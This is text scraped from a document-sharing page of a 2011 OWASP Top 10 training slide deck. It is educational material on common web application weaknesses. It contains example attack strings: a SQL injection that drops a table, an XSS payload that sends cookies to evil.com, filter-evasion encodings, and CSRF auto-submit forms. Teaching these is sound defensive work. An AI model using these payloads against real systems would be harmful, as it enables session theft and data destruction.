Get documents about "Per Josefsson OWASP Topp Tio 20110825
Shared by: HC120916172749
-
Stats
- views:
- 0
- posted:
- 9/16/2012
- language:
- Unknown
- pages:
- 19
Document Sample
OWASP top 10 - Agenda
Background
Risk based
Top 10 items 1 – 6
Live demo
Top 10 items 7 – 10
OWASP resources
OWASP
The OWASP Guide
OWASP
Threat Attack Weakness Weakness Technical Business
Agent Vector Prevalence Detectability Impact Impact
Easy Widespread Easy Severe
? Average Common Average Moderate ?
Difficult Uncommon Difficult Minor
OWASP
Warning
Risk analysis
Insiders
Architecture
Modular
Clarity
SDLC
Knowledge
Predictability
OWASP
Top 10 - 2010
1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security missconfiguration
7. Insecure cryptograpic storage
8. Failure to restrict URL access
9. Insufficient transoport layer protection
10. Unvalidated redirects and forwards
OWASP
A1 – Injection
DB
Client Appl
Shell
Pgm CPU
OWASP
A1 – Injection
String query = "SELECT * FROM accnts WHERE ID='" +
request.getParameter("id") +"'";
id="foo"
SELECT * FROM accnts WHERE ID='foo';
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
OWASP
A2 - Cross site scripting (XSS)
Browser
Appl DB
Browser
OWASP
A2 - Cross site scripting (XSS)
(String) page += "<input name='cc' type='TEXT'
value='" + request.getParameter("CC") + "'>";
CC=“123456789"
<input name='cc' value='123456789'>
CC=123456789"><script>window.location=http://evil.com?
x=document.cookie</script>
<input name='cc' value='123456789“><script>
window.location=http://evil.com?x=document.cookie
</script>'>
OWASP
A2 - Cross site scripting (XSS)
< <
<img src=http://site.com onmoseover= %3C <
<body onload= < <
<IMG SRC=jAvascript:alert('test2')> < 000003C;
< \x3c
< \x3C
< \u003c
< \u003C
<
OWASP
A3 - Broken authentication and session mngmnt
Unpredictable passwords, sessions-ID, security-
questions
No sessions-id/credentials i URL
Avoid session-fixation
Time out of sessions & logout buttons
Different sessions id outside/inside TLS
No clear text passwords
OWASP
A4 - Insecure direct object references
<SELECT name=period>
<OPTION>2010q1</OPTION>
<OPTION>2011q2</OPTION>
</SELECT>
period=2011q2
period=2011q3
OWASP
A5 - Cross-site request forgery (CSRF)
<img src="http://example.com/transferFunds?amount=1500
&destinationAccount=attackersAcct#“width="0"
height="0" />
<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
<input type="hidden" name="sp" value="8109"/>
</form>
OWASP
A6 - Security missconfiguration
Patching
OS
Application
Frameworks / libraries
Disable unnecessary services
Stack traces
Configuration
OWASP
A7 - Insecure cryptographig storage
Keep track on sensitive data
Password one-way-hashed & salted
Password/Key management
TLS key pass phrase
M2M lösenord (obfuscation)
OWASP
A8 - Failure to restrict URL access
/user/getAccounts
/admin/getAccounts
OWASP
A9 - Insufficient transport layer protection
Use SSL/TLS
No mixed content
Use secure cookies
Example FireSheep exploits poor solutions
OWASP
A10 - Unvalidated redirects and forwards
http://www.vuln.com/redir.asp?=http://www.lin
ks.com
http://%77%77%77%2E%67%6F%6F%67%6C
%65%2E%63%6F%6D
OWASP
OWASP resurser
OWASP Secure Software Contract Annex
OWASP Developer’s Guide
OWASP Enterprise Security API (ESAPI)
OWASP Software Assurance Maturity Model
(SAMM)
OWASP WebGoat
OWASP
